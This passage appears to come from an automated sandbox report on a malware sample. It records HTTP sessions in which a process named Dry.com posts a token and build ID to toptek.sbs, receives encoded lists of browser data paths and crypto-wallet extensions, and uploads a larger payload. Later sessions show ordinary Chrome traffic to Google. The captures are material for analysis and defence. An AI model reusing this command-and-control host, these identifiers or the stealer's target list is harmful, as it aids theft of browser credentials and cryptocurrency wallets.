                                                                                                                                                                                                                                                                                  2024-12-23 05:21:26 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                  Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  4192.168.2.44974594.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:28 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----OP8QIECJ5XBIM7Y5XBAI
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------OP8QIECJ5XBIM7Y5XBAIContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------OP8QIECJ5XBIM7Y5XBAIContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------OP8QIECJ5XBIM7Y5XBAICont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:29 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:29 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  5192.168.2.44974694.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:30 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----0R9H4EU37QIMYMGVKXT2
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 332
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:30 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------0R9H4EU37QIMYMGVKXT2Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------0R9H4EU37QIMYMGVKXT2Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------0R9H4EU37QIMYMGVKXT2Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:31 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:31 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  6192.168.2.44974794.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:33 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Z5XL6XTRI58QIEKFKFCT
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 7085
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:33 UTC7085OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------Z5XL6XTRI58QIEKFKFCTContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------Z5XL6XTRI58QIEKFKFCTContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------Z5XL6XTRI58QIEKFKFCTCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:33 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  7192.168.2.44974894.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:34 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Z5XL6XTRI58QIEKFKFCT
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:34 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------Z5XL6XTRI58QIEKFKFCTContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------Z5XL6XTRI58QIEKFKFCTContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------Z5XL6XTRI58QIEKFKFCTCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:34 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  8192.168.2.449754142.250.181.1324433808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:37 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:38 GMT
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-9O1WlymOi8V4G74_7Od_4Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC124INData Raw: 36 61 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 6f 6e 69 63 20 74 68 65 20 68 65 64 67 65 68 6f 67 20 33 20 6d 6f 76 69 65 20 62 6f 78 20 6f 66 66 69 63 65 22 2c 22 77 61 6c 6b 65 72 20 62 75 65 68 6c 65 72 22 2c 22 77 69 6e 74 65 72 20 77 65 61 74 68 65 72 20 61 64 76 69 73 6f 72 79 22 2c 22 75 72 73 69 64 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 22 2c 22 70 61 6c
                                                                                                                                                                                                                                                                                  Data Ascii: 6a6)]}'["",["sonic the hedgehog 3 movie box office","walker buehler","winter weather advisory","ursid meteor shower","pal
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC1390INData Raw: 77 6f 72 6c 64 20 75 70 64 61 74 65 22 2c 22 70 61 72 74 79 20 63 69 74 79 20 63 6c 6f 73 69 6e 67 20 73 74 6f 72 65 73 22 2c 22 67 6c 61 64 69 61 74 6f 72 20 69 69 20 73 74 72 65 61 6d 69 6e 67 22 2c 22 6e 66 6c 20 6d 76 70 20 6f 64 64 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a 6c 22 3a 31 30
                                                                                                                                                                                                                                                                                  Data Ascii: world update","party city closing stores","gladiator ii streaming","nfl mvp odds"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC195INData Raw: 53 6a 41 35 59 32 46 61 53 45 52 50 4f 47 74 74 4f 46 46 35 63 45 39 4a 65 45 46 48 4e 58 6c 4e 53 31 4e 58 4d 31 70 50 55 32 55 33 5a 31 6c 76 54 33 52 4a 57 6e 4a 30 4f 57 78 31 54 55 52 50 54 6e 68 48 56 46 4a 43 51 6a 42 51 63 57 52 36 52 30 70 4e 64 6d 63 34 4f 47 31 75 55 32 45 79 52 6e 5a 78 55 6d 45 31 62 57 35 72 5a 6e 56 47 5a 44 5a 7a 4e 6e 45 76 59 56 52 55 4f 55 35 6f 62 57 64 31 57 54 64 70 65 56 56 76 57 47 74 31 55 47 31 4d 53 55 4e 50 56 31 42 61 51 6a 4e 46 5a 32 4d 31 4e 32 67 32 4d 45 78 74 64 48 56 6d 62 32 35 56 54 47 46 4e 64 6a 68 34 4d 58 68 58 52 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: SjA5Y2FaSERPOGttOFF5cE9JeEFHNXlNS1NXM1pPU2U3Z1lvT3RJWnJ0OWx1TURPTnhHVFJCQjBQcWR6R0pNdmc4OG1uU2EyRnZxUmE1bW5rZnVGZDZzNnEvYVRUOU5obWd1WTdpeVVvWGt1UG1MSUNPV1BaQjNFZ2M1N2g2MExtdHVmb25VTGFNdjh4MXhXR
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC91INData Raw: 35 35 0d 0a 6d 4e 4d 55 46 70 32 63 33 56 73 51 6b 49 72 63 30 39 45 56 45 6c 51 4d 45 6c 55 4e 6a 46 54 52 31 52 54 65 55 34 7a 53 32 46 32 64 32 70 31 62 6d 73 77 59 54 68 30 62 6d 4a 4c 64 31 68 48 56 55 67 34 53 56 6c 61 65 44 64 6e 62 6a 46 4f 53 47 39 77 56 32 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 55mNMUFp2c3VsQkIrc09EVElQMElUNjFTR1RTeU4zS2F2d2p1bmswYTh0bmJLd1hHVUg4SVlaeDdnbjFOSG9wV2
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC1390INData Raw: 35 38 38 0d 0a 5a 43 4b 31 6c 45 56 55 35 53 61 45 4a 35 53 6b 6c 56 5a 69 74 73 61 56 41 34 4e 6d 46 6e 63 45 64 77 51 54 68 6f 53 56 64 7a 4b 31 5a 33 61 57 74 6d 4d 58 52 77 52 33 4d 7a 64 6c 64 6a 4f 46 59 79 61 45 6c 75 57 58 52 43 53 6e 55 33 53 57 64 43 64 30 31 6c 56 30 31 71 53 54 68 35 5a 6b 39 75 62 46 46 4f 5a 46 4a 78 4e 6e 4a 6b 56 48 4e 59 64 57 51 33 53 30 4d 79 55 31 46 31 4e 33 55 72 65 6e 63 35 63 57 74 73 61 33 64 47 5a 48 46 70 52 30 78 50 65 6a 42 7a 54 46 4e 6c 62 6e 52 51 4d 44 5a 4b 55 6d 56 59 4d 44 42 46 63 6b 68 7a 61 55 5a 54 56 31 42 76 51 57 56 4c 54 47 52 4e 62 45 31 4d 51 30 4a 79 4d 6c 4e 6c 54 57 4e 6e 65 6b 78 6f 61 47 35 31 63 56 4e 34 4d 31 4e 71 4e 57 6c 76 51 6d 35 71 5a 47 70 32 63 57 78 6b 54 6d 6b 35 55 6b 56 50
                                                                                                                                                                                                                                                                                  Data Ascii: 588ZCK1lEVU5SaEJ5SklVZitsaVA4NmFncEdwQThoSVdzK1Z3aWtmMXRwR3MzdldjOFYyaEluWXRCSnU3SWdCd01lV01qSTh5Zk9ubFFOZFJxNnJkVHNYdWQ3S0MyU1F1N3Urenc5cWtsa3dGZHFpR0xPejBzTFNlbnRQMDZKUmVYMDBFckhzaUZTV1BvQWVLTGRNbE1MQ0JyMlNlTWNnekxoaG51cVN4M1NqNWlvQm5qZGp2cWxkTmk5UkVP
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC33INData Raw: 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: ERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  9192.168.2.449755142.250.181.1324433808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
